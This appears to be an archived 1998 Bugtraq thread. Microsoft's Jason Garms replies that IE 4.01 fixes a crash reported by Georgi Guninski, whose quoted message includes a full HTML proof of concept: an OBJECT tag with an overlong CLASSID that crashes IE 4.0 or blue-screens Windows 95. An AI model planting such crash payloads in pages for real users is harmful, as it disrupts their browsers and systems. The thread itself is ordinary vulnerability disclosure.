Georgi, The bug that caused the browser to crash in this way was fixed in IE 4.01 (which BTW is what's in Win98). People using 4.01 or 4.01 with SP1 cannot be crashed in this way. Thanks, -JasonG Jason Garms, JasonGat_private Product Manager Windows NT Security Microsoft Corporation -----Original Message----- From: Georgi Guninski [mailto:guninskiat_private] Sent: Tuesday, July 28, 1998 10:11 AM To: BUGTRAQat_private Subject: Object tag crashes Internet Explorer 4.0 The <OBJECT> tag seems to crash Internet Explorer 4.0 under Win95 (don't know about other versions/OS). The following: <OBJECT CLASSID=____More than 250 characters here____></OBJECT> opens a dialog box "IEXPLORE: ...illegal operation" and closes IE 4.0, or a blue screen with "Fatal exception 0E" and you need to reboot. I don't think this is exploitable(?), but it is a bad "feature". Georgi Guninski guninskiat_private http://www.geocities.com/ResearchTriangle/1711 -------------------------------------Cut here: Object.html ------- <HTML> Trying to crash IE 4.0 <OBJECT CLASSID=11111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111> </OBJECT> </HTML> ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:10:22 PDT